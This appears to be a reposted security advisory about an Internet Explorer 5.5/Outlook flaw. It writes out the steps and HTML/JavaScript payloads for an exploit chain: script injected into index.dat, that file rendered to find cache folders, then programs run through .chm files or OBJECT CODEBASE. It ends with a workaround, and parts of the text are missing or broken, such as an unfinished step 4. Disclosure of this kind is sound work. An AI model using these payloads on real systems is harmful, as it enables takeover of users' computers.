IE 5.5 probably 5.x and Outlook/Outlook Express, have not tested
Following is based on a Georgi Guninski security advisory #29.
This is completely different issue from Advisory #28 "IE
5.x/Outlook allows executing arbitrary programs using .chm files
and temporary internet files folder" though both use some common
There is a security vulnerability in IE 5.5 (probably 5.x and
Outlook) which allows executing arbitratrary programs using
OBJECT TYPE="text/html" and parsing index.dat by revealing the
location of temporary internet files folder. This may lead to
taking full control over user's computer.
If one can inject a file on user's local disk and know its
location it is possible to execute arbitrary programs in at least
two ways:
1) window.showHelp("c:\\dir\\hostile.chm")
2) <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002" CODEBASE="C:\DIR\HOSTILE.EXE">
So the question arise how to inject a specified file on user's
disk. A good way is to use the Temporary Internet Files Folder
which contain cached documents and files. The problem with it is
there are several subfolders with random names. But there is a
special file "index.dat" which is something like a catalog or
registry which contains all visited URLs and which is more
important the names of the random folders in its beginning. It is
locatated in C:/WINDOWS/Temporary Internet Files/Content.IE5/
under Win9x and in C:/Documents and Settings/USERNAME/Local \
Settings/Temporary Internet Files/Content.IE5/ under Win2K - so
under Win2K the username of the current user must be known or
guessed which makes things more difficult.
It is possible to inject JavaScript in it by just doing:"http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
because this URL shall be written in it.
So if it can be parsed by IE and the JavaScript be executed the
names of the random folders will be known. But Microsoft tries
to prevent parsing non-HTML files and they have issued a security
bulletin in August:
But it is possible to parse (render) non-HTML files in the
following way:
<OBJECT TYPE="text/html" DATA="file://c:/file.dat"></OBJECT>
So the exploit scenario is:
1) inject JavaScript in index.dat by"http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
The JavaScript is executed in index.dat and has access to its
content, which allow to find the random directory names
2) parse/render index.dat by:
<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
3) After the Temporary internet Files Folders are known inject for
example chm files by:
<OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
4) Do
The presense of the random temporary internet files folders in
index.dat is very dangerous - it means that every Cross Frame
Security vulnerability or vulnerability that reads local files
may lead to executing arbitrary programs. This means that a lot
of previous vulnerabilities are much more serious that we have
realized when they were discovered.
The code is:
This demo is for Windows 9x - you must modify the source for Win2K.
You may need to wait a few minutes if you have slow computer. If you
have Pentium 500 or better or use Win2K probably much less. It is
expected a window with location "about:blank" to be opened containing
index.dat - the file where the random names of temporary internet
files directories are kept (they are random names in the beginning of
the window) and the list of all visited URLs among other stuff. Once
the temporary internet files directories are know it is possible to
execute arbitrary programs thru cached files and showHelp() or OBJECT
If you don't see a window with location "about:blank" and content of
index.dat close IE and visit the page again.
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet
Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
//s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local
Settings/Temporary Internet Files/Content.IE5/index.dat"
TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
// ^^^ This is for Win2K ------------you must change "Administrator" to
the actual user name
Demonstration which opens index.dat which contains the Temporary
Internet Files Folders and the list of all visited URLs is
Disable Active Scripting and move the location of the Temporary
Internet Files Folder to unpredicatable location.